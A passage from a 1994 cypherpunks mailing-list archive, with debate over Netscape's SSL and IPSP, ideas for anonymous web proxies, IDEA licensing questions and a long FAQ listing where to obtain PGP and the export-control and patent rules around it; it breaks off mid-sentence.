Tim May is correct that a "broadcast polygraph" is not planned by Fleming and Co. However, they do contemplate at least sampling vital signs using their technology. Since my opinion is that polygraphs are almost totally useless for detecting deception, I think the same would apply in spades to broadcast vital signs. In addition, all that is planned for the localizer is pulse and maybe blood pressure. That's enough to see if the officer is in trouble (or engaged in sexual activity, by the way), but not enough to test his/her veracity. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jamesd at netcom.com Tue Dec 13 11:53:40 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 13 Dec 94 11:53:40 PST Subject: IPSP and Netscape In-Reply-To: <199412130859.IAA10748@neon.mcom.com> Message-ID: <199412131952.LAA02566@netcom10.netcom.com> Eric Hughes wrote: > > ... the claims that SSL is better than anything > > else out there Marc Andreessen writes > I'm sorry, I don't remember such a claim being made. Eric and Perry have repeatedly used this method - not only attacking a straw man, but lying outright that their opponent has *explicitly* proclaimed the straw man. I am thoroughly sick of this dishonest debating tactic. If someone genuinely believe his opponent assumes or implies something that is obviously false he should say "implies" or "assumes" To say "claims" or "states" is to say something completely different. One may be a reasonable inference, as I inferred that Chomsky sought to justify mass murder and brutal terror. The other is a lie. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From srikar at netcom.com Tue Dec 13 11:58:43 1994 From: srikar at netcom.com (Shrieks) Date: Tue, 13 Dec 94 11:58:43 PST Subject: calling all cpunks on netcom Message-ID: <199412131946.LAA26053@netcom20.netcom.com> Hi all, Just floating a trial balloon. Are you tired of the high traffic on the cypherpunks list and having to wade through a ton of mail every day? Any of you folks approaching your 5M limit from archiving too many messages? Well, I am and I don't really want to start paying for the extra memory. I was wondering if it might be worth petitioning the netcom sysadmins to start up a local newsgroup (eg. netcom.cpunks) that serves as an archive for the mailing list. That way one gets to use the abilities of to keep threads together and so forth. I'm sure there are enough netcom subscribers to warrant this. Another alternative might be to set up something along the lines of discuss at mit, which is a local collection of "meetings" on various topics that one can browse through and serves as a handy archiver too since it isn't flushed nearly as often as a Usenet queue. I believe this list is already archived in a discuss meeting at MIT. Just a thought. Pheedback? -S ---- Srikar "shrieks" Srinath srikar at netcom.com Hackito Ergo Sum ---- "Free your mind and your ass will follow." - George Clinton From storm at marlin.ssnet.com Tue Dec 13 11:58:48 1994 From: storm at marlin.ssnet.com (Don Melvin) Date: Tue, 13 Dec 94 11:58:48 PST Subject: It works. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I got PGP because of the comments by Freeh and I wanted to start 'showing the flag'. It was inconveniet doing it right while using reading mail/news on-line so I settled for just adding the "PGP key available" to my sig. Then along comes Eric with the idea of signing the posts to cypherpunks. All right, it's a good idea so I'll spend the time necessary to set up PGP support with the off-line reader called YARN. Now, been there done that. Funny thing is, last night I actually had a valid reason to send something that I wanted to make sure didn't get read along the way ($ involved). I had all the pieces, they were in place, they worked. And due to time constraints, I wouldn't have been able to do it, if everything hadn't been ready. So, thanks Eric. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBLu29gbU8rMgiP9PxAQEgjQL/Vp3tc6gFWAh58RQinsdYMy1R6kS/KEHs 6TpGs8NzjNXT+yy+FHV0heI8R3F9mXZesefxj4XQmBxgKxkOcpp4PZQiXhHIiEOp Gg6n+B8fPdGAVuydJXLlKu/69oMtbflw =z+w3 -----END PGP SIGNATURE----- From blancw at microsoft.com Tue Dec 13 12:03:59 1994 From: blancw at microsoft.com (Blanc Weber) Date: Tue, 13 Dec 94 12:03:59 PST Subject: James vs. Eric Message-ID: <9412132003.AA27745@netmail.microsoft.com> From: "L. McCarthy" Eric & James, how about taking the "You're flaming me !" "No, I'm just insulting you !" portion of this debate to private email ? I sincerely doubt that very many people on the list give a damn about any of the above jousting. .................................................................. Actually, I find it mildly amusing, myself, in between the Netscape thing, and I'm also picking up on logic, game theory, and white spaces. Except I don't know what "De mortuis mentis, nil nisi Latinum" means ("the brain dead can't understand Latin"?) :>) Blanc From jim at acm.org Tue Dec 13 12:15:31 1994 From: jim at acm.org (Jim Gillogly) Date: Tue, 13 Dec 94 12:15:31 PST Subject: IDEA freeware In-Reply-To: <9412130948.ZM18452@warp.mcom.com> Message-ID: <9412132014.AA12191@mycroft.rand.org> > "Kipp E.B. Hickman" writes: > On Dec 13, 3:45pm, Tom Jones wrote: > > Subject: IDEA freeware > > > > Please explain where this "freeware" IDEA code comes from. IDEA is a > > patented algorithm that cannot be used without a license. PGP comes > > with a license. I know of no other code in the US that has such a > > license. > If you are using it for non-comercial use, it's free. If you're using PGP for non-commercial use, IDEA is free because it's licensed for non-commercial PGP use. I'm pretty confident that you need to get a separate IDEA license with any new product you use it in, commercial or not. I have the e-mail contact address somewhere, and can post it if need be. Jim Gillogly Mersday, 23 Foreyule S.R. 1994, 20:14 From hfinney at shell.portal.com Tue Dec 13 12:29:36 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 13 Dec 94 12:29:36 PST Subject: Authentication vs encryption: CPs on the web In-Reply-To: <199412131851.NAA22099@bwnmr5.bwh.harvard.edu> Message-ID: <199412132029.MAA22274@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Adam Shostack writes: > With all due respect, I disagree with your assessment. >Anonymity is a job, and we should build small tools to do jobs. It is >my feeling that building anonymity into the web will make the >protocols more complex than they need to be. I don't think this is necessarily the case. Anonymity is often a matter of _not_ stamping identification onto a packet. Rather than complicating protocols it will often just be a matter of having options not to include certain fields. For example, the current HTTP has an option to send a user name when the client makes connections. I have heard that the Netscape client sends this and has no switch to turn it off. You can put in a fake name (or none) but then when you want to send email your reply address is wrong. This is an example where support for privacy should be in the client and can't really be added on. > There is no anonymity in mail, but we have anonymous mail of >varying privacy. I suspect mixmaster will greatly enhance that. To >get privacy in the web, build a web remailer on top of the CERN or TIS >HHTPd proxies. Encrypt between you & the proxy, let the proxy go out. I think this is a fine idea if this could work. The way proxy support works now, the client connects to the proxy and then sends it the URL. This means that the proxy knows which clients are connecting to which web pages and must be trusted to keep this private. What you need is a way of chaining proxies such that no one proxy sees both the client and server addresses. This is what we have with the remailers. But again this would appear to require changes to the clients and corresponding protocols. Perhaps it would work to have a local trusted proxy running right on your machine which implements the connection to a chain of web remailers. You can run vanilla clients with their nice UI's and other hot features, and all of your net accesses go through your local proxy which cleans them up and uses chaining for access. This sounds like a doable project which would be worth exploring. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLu4EARnMLJtOy9MBAQENJwIAvAM5rzAog54rLTmDy8wGBxJsxk4XfIYE rGXif7AUrFwx+u1IeDnjQxNs8cul/1S/g02/rsyVKyCdT0dSfUCzoA== =ZvjT -----END PGP SIGNATURE----- From marca at mcom.com Tue Dec 13 12:49:48 1994 From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen) Date: Tue, 13 Dec 94 12:49:48 PST Subject: the netscape/ssl controversy Message-ID: <199412132050.MAA28636@neon.mcom.com> In article <199412131448.JAA07613 at cutter.clas.ufl.edu>, avi at clas.ufl.edu (Avi Harris Baumstein) wrote: > so while ssl may well be a wonderful protocol, it does not address the > problems that many cypherpunks see as being real. i think it would do > netscape good to listen to and consider the views of many on this > list, as they have many genuinely good ideas Yup, we are absolutely doing so. We do not and have not assumed that SSL is *the* answer to everything, and we will be doing a lot more work over the next year and beyond to tackle many of these other problems. We're listening to everyone, and we love constructive suggestions and feedback. Cheers, Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From marca at mcom.com Tue Dec 13 12:49:53 1994 From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen) Date: Tue, 13 Dec 94 12:49:53 PST Subject: BofA+Netscape Message-ID: <199412132050.MAA28648@neon.mcom.com> In article <9412131442.AA12105 at snark.imsi.com>, perry at imsi.com wrote: > Marc Andreessen says: > > >I told you in Email, Mr. Andreessen, that new transport level security > > >protocols are useless now that IPSP has come near to standardization > > >and now that prototype implementations are nearly available. > > > > Great, IPSP looks fantastic and we look forward to supporting it > > as it moves through and beyond the "near" phase. > > Given that you haven't read any IPSP documents, I can only interpret > your comments as sarcasm. No, actually, my comments weren't (aren't) sarcasm. Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From sdw at lig.net Tue Dec 13 12:50:39 1994 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 13 Dec 94 12:50:39 PST Subject: subscription terminstion In-Reply-To: <01HKLHEHFPB6006HMI@FRCU.EUN.EG> Message-ID: > > please i want to terminate my subscription in your groupe > because i have small quota . > It's not the size of your quota, it's how you use it... -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From marca at mcom.com Tue Dec 13 12:51:46 1994 From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen) Date: Tue, 13 Dec 94 12:51:46 PST Subject: BofA+Netscape Message-ID: <199412132050.MAA28663@neon.mcom.com> In article <199412131914.LAA26551 at netcom10.netcom.com>, jamesd at netcom.com (James A. Donald) wrote: > > Marc Andreessen says: > > > Great, IPSP looks fantastic and we look forward to supporting it > > > as it moves through and beyond the "near" phase. > > He said that Netscape would look at IPSP when it was beyond > the "near" phase. Nope, I said we "look forward to supporting it". Slight difference. :-) We are looking at it already. Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From merriman at metronet.com Tue Dec 13 13:02:17 1994 From: merriman at metronet.com (David K. Merriman) Date: Tue, 13 Dec 94 13:02:17 PST Subject: Enough, already Message-ID: <199412132101.AA01632@metronet.com> I don't mean to be a wet blanket (well, actually, I do :-), but could folks maybe drop the Netscape stuff - along with the tangential threads it has spawned? I kinda suspect that by now, the subject has been thoroughly flogged to death, and it's cluttering the hell out of the list - without the benefit of actually _resolving_ anything. Netscape is gonna do whatever the hell Netscape is gonna do. "We" can encourage, cajole, reprimand, sneer, laugh, applaud, or whatever; but the bottom line is that clarifying the clarifications of the clarified previous comments isn't accomplishing anything other than making those among us who have to pay for email work overtime to compensate for the subject. It's the holiday season. How about if everyone wishes everyone else a Merry Christmas (or Chappy Chanukka, or whatever else spins your propeller), kisses, and makes up? Dave "I'm just checking how to make Chameleon killfile the subjects 'clarif', 'Netscape', and 'BofA'" Merriman PS - for point of reference, my mailbox has 41 messages in it since I last checked mail (less than 6 hours ago). Only 3 are non-CP; of the 38 that are, only a very, VERY few don't have "netscape" or "clarification" in the subject line. - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From mpj at netcom.com Tue Dec 13 13:07:34 1994 From: mpj at netcom.com (Michael Paul Johnson) Date: Tue, 13 Dec 94 13:07:34 PST Subject: Where to get PGP FAQ Message-ID: -----BEGIN PGP SIGNED MESSAGE----- ===============================BEGIN SIGNED TEXT============================= WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) (Last modified: 13 December 1994 by Mike Johnson) WHAT IS THE LATEST VERSION? |-----------------+---------------------+---------------------------------| | Platform(s) | Latest Version | Distribution File Names | |-----------------+---------------------+---------------------------------| | DOS, Unix, | Viacrypt PGP 2.7 | disk sets | | Mac, Windows, | | | | or WinCIM/CSNav | | | |-----------------+---------------------+---------------------------------| | DOS, Unix, | MIT PGP 2.6.2 | pgp262.zip (DOS + docs) | | others | | pgp262s.zip (source) | | | | pg262s.zip source on CompuServe | | | | pgp262.tar.gz (source) | | | | pgp262.gz (same as above on DOS)| | | | pgp262.tar.Z (source) | | | | pgp262dc.zip (documentation) | | | | pg262d.zip (docs on CompuServe) | |-----------------+---------------------+---------------------------------| | Macintosh | MIT PGP 2.6 | MacPGP2.6.sea.hqx (binary+docs) | | | | macpgp26.hqx (same as above) | | | | MacPGP2.6.src.sea.hqx (source) | | | | macpgp26.src (same as above) | | | | MacPGP2.6-68000.sea.hqx (binary)| | | | mcpgp268.hqx (same as above) | |-----------------+---------------------+---------------------------------| | Mac Applescript | MacPGP 2.6ui v 1.2 | MacPGP-2.6ui-v1.2.sit.hqx | | | + some beta versions| MacPGP2.6ui_V1.2_sources.cpt.hqx| | | based on MIT PGP | MacPGP2.6uiV1.2en.cpt.hqx | | | 2.6.2 | MacPGP2.6uiV1.2src.cpt.hqx | | | | MacPGP2.6uiV1.2.68000.hqx | |-----------------+---------------------+---------------------------------| | Amiga | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha | | | | pgp262-a14-020.lha | | | | pgp262-a14-src.lha | |-----------------+---------------------+---------------------------------| | Atari | Atari PGP 2.6ui | pgp26uib.lzh (binary, docs) | | | | pgp26uis.lzh | |-----------------+---------------------+---------------------------------| | Archimedes | Archimedes 2.3a | ArcPGP23a | |-----------------+---------------------+---------------------------------| | Non-USA version | PGP 2.6.i from | pgp26i.zip | | to avoid RSAREF | Stale Schumacher | pgp26is.zip | | license. | | pgp26is.tar.gz | |_________________|_____________________|_________________________________| WHERE CAN I GET THE PGP VERSION DIRECTLY FROM PHILIP ZIMMERMANN? This is the MIT version. For several good reasons, Phil is releasing the main line freeware PGP through MIT, at net-dist.mit.edu. See a list of sites that also carry this version, below, or use this WWW URL: http://web.mit.edu/network/pgp-form.html WHAT IS PGP 2.6.i? Stale Schumacher released an international version of PGP built the "right way." By "right way," I mean that it uses the latest MIT code, but uses a different rsaglue.c to use the mpilib instead of RSAREF for RSA calculations, thus including all the latest bug fixes and features in the main freeware PGP code line, but frees non-USA persons from the limitations of the RSAREF license. This release has been as strongly endorsed by Philip Zimmermann as he can do without incriminating himself. Naturally, by not using the RSAREF code for RSA calculations, this version is not legal for use in the USA (other than limited research, etc.), but is fine anywhere else (like Canada) were RSA patents don't hold. Note that the latest version of Stale Schumacher's PGP is 2.6.i, 2.6i (without the second .) was a beta test version that has been superceded. WHAT IS PGP 2.6ui? The "unofficial international" versions are really just PGP 2.3a, modified just enough to make it compatible with MIT PGP 2.6, but do not include all of the fixes in MIT PGP 2.6 and MIT PGP 2.6.1. They have a "ui" somewhere in their file names. I recommend the use of the "ui" versions only if you are using a platform for which there is no Viacrypt or MIT PGP that works properly. For a version that doesn't use RSAREF, PGP 2.6.i from Stale Schumacher is a better choice, because it is more up-to-date. WHERE CAN I GET VIACRYPT PGP? If you are a commercial user of PGP in the USA or Canada, contact Viacrypt in Phoenix, Arizona, USA. The commecial version of PGP is fully licensed to use the patented RSA and IDEA encryption algorithms in commercial and government environments in the USA and Canada. It is fully compatible with, functionally the same as, and just as strong as the freeware version of PGP. Due to limitations on ViaCrypt's RSA distribution license, ViaCrypt only distributes executable code and documentation for it, but they are working on making PGP available for a variety of platforms. Call or write to them for the latest information. The latest version number for Viacrypt PGP is 2.7. Here is a brief summary of Viacrypt's currently-available products: 1. ViaCrypt PGP for MS-DOS. Prices start at $99.98 2. ViaCrypt PGP for UNIX. Includes executables for the following platforms: SunOS 4.1.x (SPARC) IBM RS/6000 AIX HP 9000 Series 700/800 UX SCO 386/486 UNIX SGI IRIX AViiON DG-UX(88/OPEN) Prices start at $149.98 Executables for the following additional platforms are available upon request for an additional $30.00 charge. BSD 386 Ultrix MIPS DECstation 4.x 3. ViaCrypt PGP for WinCIM/CSNav. A special package for users of CompuServe. Prices start at $119.98 Please contact ViaCrypt for quantity discount pricing. Orders may be placed by calling 800-536-2664 during the hours of 8:30am to 5:00pm MST, Monday - Friday. They accept VISA, MasterCard, AMEX and Discover credit cards. If you have further questions, please feel free to contact: Paul E. Uhlhorn Director of Marketing, ViaCrypt Products Mail: 9033 N. 24th Avenue Suite 7 Phoenix AZ 85021-2847 Phone: (602) 944-0773 Fax: (602) 943-2601 Internet: viacrypt at acm.org Compuserve: 70304.41 WHERE CAN I GET THE FREEWARE PGP? These listings are subject to change without notice. If you find that PGP has been removed from any of these sites, please let me know so that I can update this list. Likewise, if you find PGP on a good site elsewhere (especially on any BBS that allows first time callers to access PGP for free), please let me know so that I can update this list. Because this list changes frequently, I have not attempted to keep it complete, but there should be enough pointers to let you easily find PGP. There are several ways to get the freeware PGP: ftp, WWW, BBS, CompuServe, email ftp server, and sneakernet (ask a friend for a copy). Just don't ask Philip Zimmermann directly for a copy. FTP SITES IN NORTH AMERICA There are some wierd hoops to jump through, thanks to the U. S. Department of State and the ITAR, at many of these sites. Telnet to net-dist.mit.edu, log in as getpgp, answer the questions, then ftp to net-dist.mit.edu and change to the hidden directory named in the telnet session to get your own copy. MIT-PGP is for U. S. and Canadian use only, but MIT is only distributing it within the USA (due to some archaic export control laws). 1. Read ftp://net-dist.mit.edu/pub/PGP/mitlicen.txt and agree to it. 2. Read ftp://net-dist.mit.edu/pub/PGP/rsalicen.txt and agree to it. 3. Telnet to net-dist.mit.edu and log in as getpgp. 4. Answer the questions and write down the directory name listed. 5. QUICKLY end the telnet session with ^C and ftp to the indicated directory on net-dist.mit.edu (something like /pub/PGP/dist/U.S.-only-????) and get the distribution files (see the above chart for names). If the hidden directory name is invalid, start over at step 3, above. You can also get PGP from: ftp.csn.net/mpj ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/pgp/ See ftp://ftp.csn.net/mpj/README.MPJ for the ??????? See ftp://ftp.csn.net/mpj/help for more help on negotiating this site's export control methods (open to USA and Canada). ftp.netcom.com/pub/mp/mpj ftp://ftp.netcom.com/mp/mpj/I_will_not_export/crypto_???????/pgp/ See ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ for the ??????? See ftp://ftp.netcom.com/pub/mp/mpj/help for more help on negotiating this site's export control methods. TO GET THESE FILES BY EMAIL, send mail to ftp-request at netcom.com containing the word HELP in the body of the message for instructions. You will have to work quickly to get README.MPJ then the files before the ??????? part of the path name changes again (several times a day). ftp.eff.org Follow the instructions found in README.Dist that you get from one of: ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist gopher.eff.org, 1/Net_info/Tools/Crypto gopher://gopher.eff.org/11/Net_info/Tools/Crypto http://www.eff.org/pub/Net_info/Tools/Crypto/ ftp.csua.berkeley.edu (for U. S. or Canadian users) /pub/cypherpunks/pgp/ ftp.wimsey.bc.ca /pub/crypto/software/dist/US_or_Canada_only_XXXXXXX/PGP (U. S. and Canadian users only) See /pub/crypto/software/README for the characters for XXXXXXXX This site has all public releases of the freeware PGP. WORLD WIDE WEB ACCESS http://web.mit.edu/network/pgp-form.html http://www.ifi.uio.no/~staalesc/PGPVersions.html http://www.mantis.co.uk/pgp/pgp.html http://rschp2.anu.edu.au:8080/crypt.html http://www.eff.org/pub/Net_info/Tools/Crypto/ http://community.net/community/all/home/solano/sbaldwin COMPUSERVE The NCSA Forum sysops have a library (Library 12: Export Controlled) that is available only to people who send them a message asserting that they are within the U. S. A. This library contains PGP. I have also seen PGP in some other places on Compuserve. Try searching for PGP262.ZIP in the IBMFF forum for up-to-date information on PGP in selected other areas. The last time I tried a search like this, PGP was found in the PC World Online forum (GO PWOFORUM) new uploads area, along with several PGP shells and accessories. I've also heard that EUROFORUM carries PGP, but have not confirmed this. Compuserve file names are even more limited than DOS (6.3 instead of the already lame 8.3), so the file names to look for are PGP262.ZIP, PG262S.ZIP (source code), PGP262.GZ (Unix source code) and PG262D.ZIP (documentation only). BULLETIN BOARD SYSTEMS Colorado Catacombs BBS Mike Johnson, sysop Mac and DOS versions of PGP, PGP shells, and some other crypto stuff. Also the home of some good Bible search files and some shareware written by Mike Johnson, including ATBASH, DLOCK, CRYPTA, CRYPTE, CRYPTMPJ, MCP, MDIR, DELETE, PROVERB, SPLIT, ONEPAD, QUICRYPT, etc. v.FAST/v.32bis/v.42bis, speeds up to 28,800 bps 8 data bits, 1 stop, no parity, as fast as your modem will go. Use ANSI terminal emulation, of if you can't, try VT-100. Free access to PGP. If busy or no answer, try again later. Log in with your own name, or if someone else already used that, try a variation on your name or pseudonym. You can request access to crypto software on line, and if you qualify legally under the ITAR, you can download on the first call. For free access: log in with your own name, answer the questions, then select [Q]uestionaire 3 from the [M]ain menu. (303) 772-1062 Longmont, Colorado number - 2 lines. (303) 938-9654 Boulder, Colorado number forwarded to Longmont number intended for use by people in the Denver, Colorado area. The Freedom Files BBS, DeLand Florida, USA 904-738-2691 Exec-Net, New York, NY, USA (Host BBS for the ILink net) 914-667-4567 The Ferret BBS (North Little Rock, Arkansas) (501) 791-0124 also (501) 791-0125 Special PGP users account: login name: PGP USER password: PGP This information from: Jim Wenzel CVRC BBS 317-791-9617 CyberGold BBS 601-582-5748 Self-Governor Information Resource, 915-587-7888, El Paso, Texas, USA In the UK, try 01273-688888 Other BBS -- check your local BBS. Chances are good that it has any release that is at least a month old if it has much of a file area at all. OTHER FTP SITES ftp.informatik.uni-hamburg.de /pub/virus/crypt/pgp This site has most, if not all, of the current PGP files. ftp.ox.ac.uk (163.1.2.4) /pub/crypto/pgp This is a well organized site with most of the current PGP files as well as shells and mailer scripts. ftp.netcom.com /pub/dc/dcosenza -- Some crypto stuff, sometimes includes PGP. /pub/qw/qwerty -- How to MacPGP Guide, largest steganography ftp site as well. PGP FAQ, crypto FAQ, US Crypto Policy FAQ, Steganograpy software list. MacUtilites for use with MacPGP. Stealth1.1 + other steganography programs. Send mail to ftp-request at netcom.com with "HELP" in the body of the message if you don't have ftp access. ftp.ee.und.ac.za /pub/crypto/pgp ftp.csua.berkeley.edu /pub/cypherpunks/pgp (DOS, MAC) ftp.demon.co.uk /pub/amiga/pgp /pub/archimedes /pub/pgp /pub/mac/MacPGP ftp.informatik.tu-muenchen.de ftp.funet.fi ftp.dsi.unimi.it /pub/security/crypt/PGP ftp.tu-clausthal.de (139.174.2.10) (Atari ST/E,TT,Falcon) /pub/atari/misc/pgp/pgp26uib.lzh (2.6ui ttp, 2.3a docs) /pub/atari/misc/pgp/pgp26uis.lzh (2.6ui sources) /pub/atari/misc/pgp/pgp26ui.diffs (Atari diffs for 2.6 sources) wuarchive.wustl.edu /pub/aminet/util/crypt src.doc.ic.ac.uk (Amiga) /aminet /amiga-boing ftp.informatik.tu-muenchen.de /pub/comp/os/os2/crypt/pgp23os2A.zip (OS/2) iswuarchive.wustl.edu pub/aminet/util/crypt (Amiga) nic.funet.fi (128.214.6.100) /pub/crypt ftp.uni-kl.de (131.246.9.95) /pub/aminet/util/crypt qiclab.scn.rain.com (147.28.0.97) pc.usl.edu (130.70.40.3) leif.thep.lu.se (130.235.92.55) goya.dit.upm.es (138.4.2.2) tupac-amaru.informatik.rwth-aachen.de (137.226.112.31) ftp.etsu.edu (192.43.199.20) princeton.edu (128.112.228.1) pencil.cs.missouri.edu (128.206.100.207) ftp.csua.berkeley.edu kauri.vuw.ac.nz nctuccca.edu.tw /PC/wuarchive/pgp/ ftp.fu-berlin.de:/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz Also, try an archie search for PGP using the command: archie -s pgp262 (DOS & Unix Versions) archie -s pgp2.6 (MAC Versions) FTPMAIL For those individuals who do not have access to FTP, but do have access to e-mail, you can get FTP files mailed to you. For information on this service, send a message saying "Help" to ftpmail at decwrl.dec.com. You will be sent an instruction sheet on how to use the ftpmail service. It works with messages something like this: > To: ftpmail at decwrl.dec.com > Subject: Ftpmail request > Connect ftp.csua.berkeley.edu > chdir pub/cypherpunks/pgp/pgp262 > uuencode > get pgp262.zip > quit Another e-mail service is from nic.funet.fi. Send mail to mailserv at nic.funet.fi with the word HELP. For the ftp sites on netcom, send mail to ftp-request at netcom.com containing the word HELP in the body of the message. To get pgp 2.6.i by email: Send a message to hypnotech-request at ifi.uio.no with your request in the Subject: field. Subject What you will get GET pgp26i.zip MS-DOS executable (uuencoded) GET pgp26is.zip MS-DOS source code (uuencoded) GET pgp26is.tar.gz UNIX source code (uuencoded) For FAQ information, send e-mail to mail-server at rtfm.mit.edu with send usenet/news.answers/ftp-list/faq in the body of the message. IS MY COPY OF PGP GOOD? If you find a version of the PGP package that does not include the PGP User's Guide, something is wrong. The manual should always be included in the package. PGP should be signed by one of the developers (Philip Zimmermann, Jeff Schiller, Viacrypt, Stale Schumacher, etc.). If it isn't, the package is suspect and should not be used or distributed. The site you found it on should remove it so that it does no further harm to others. To be really sure, you should get PGP directly from MIT or check the signatures with a version of PGP that you trust. The copies of PGP on ftp.csn.net/mpj, ftp.netcom.com/pub/mp/mpj, and the Colorado Catacombs BBS are direct copies of the ones on MIT, except that the ones on the BBS include a BBS advertisement (automatically added by the system when it virus scans new files) in the outer .zip files. OTHER PGP DOCUMENTATION PGP is rather counter-intuitive to a Mac user. Luckily, there's a guide to using MacPGP in ftp://ftp.netcom.com/pub/qw/qwerty/Here.is.How.to.MacPGP. For more information on the "time bomb" in PGP, see ftp://ftp.csn.net/mpj/pgpbomb.asc More PGP details are at http://www.pegasus.esprit.ec.org/people/arne/pgp.html Windows shells documentation http://www.LCS.com/winpgp.html LANGUAGE MODULES These are suitable for most PGP versions. I am not aware of any export/import restrictions on these files. German * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha Italian * _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz * _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz Japanese * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz Lithuanian * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip Russian * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip * _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip (MIT version) * _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26uir.zip (ui version) * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip Spanish * _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz * _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz Swedish * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt MAILINGLISTE FUER PGP UND VERWANDTES (PGP MAILING LIST IN GERMAN) Die Listenadresse: pgp-friends at fiction.pb.owl.de Die *Request*adresse (fuer subscribe/unsubscribe und andere Administra- tiva): pgp-friends-request at fiction.pb.owl.de WHAT IS ALL THIS NONSENSE ABOUT EXPORT CONTROLS? For a detailed rant, get ftp://ftp.csn.net/mpj/cryptusa.zip The practical meaning, until the law is corrected to make sense, is that you are requested to get PGP from sites outside of the USA and Canada if you are outside of the USA and Canada. If you are in France, I understand that you aren't even supposed import it. Other countries may be worse. Make sure you follow the laws of your own country. If you want to officially export PGP, you may be able to get permission in limited cases and for a fee. Contact the U. S. Department of State for information. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN THE USA? MIT PGP is only for personal, noncommercial use because of restrictions on the licensing of both the RSA algorithm (attached to RSAREF) and the IDEA algorithm. PKP/RSADSI insist that we use RSAREF instead of the mpi library for reasons that make sense to them. For commercial use, use Viacrypt PGP, which is fully licensed to use both the RSA and IDEA algorithms in commercial and corporate environments (as well as personal use, of course). Another restriction is due to an exclusive marketing agreement between Philip Zimmermann and Viacrypt that applies to the USA and Canada only. Viacrypt has exclusive rights to market PGP commercialy in this area of the world. This means that if you want to market PGP commercially in competition with Viacrypt in the USA or Canada, you would have to create a new implementation of the functions of PGP containing none of Philip Zimmermann's copyrighted code. You are free to modify existing PGP code for your own use, as long as you don't sell it. Phil would also appreciate your checking with him before you distribute any modified versions of PGP as freeware. "PGP", "Pretty Good Privacy" and "Phil's Pretty Good Software" are trademarks owned by Philip Zimmermann. This means that if you modify an older version of PGP that was issued under the copyleft license and distribute it without Phil's permission, you have to call it something else. This avoids confusing all of us and protects Phil's good name. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN CANADA? MIT PGP is only for noncommercial use because of restrictions on the licensing of the IDEA algorithm. Because the RSA algorithm isn't patented in Canada, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license associated with the RSAREF copyright, which is valid in Canada. For commercial use, use Viacrypt PGP, which is fully licensed to use the IDEA algorithm in commercial and corporate environments. The exclusive marketing agreement with Viacrypt also applies in Canada. See the section on USA intellectual property restrictions for more details. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST OUTSIDE NORTH AMERICA? MIT PGP is only for noncommercial in areas where there is a patent on software implementations of the IDEA algorithm. Because the RSA algorithm isn't patented outside of the USA, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license restrictions. The RSAREF copyright holds 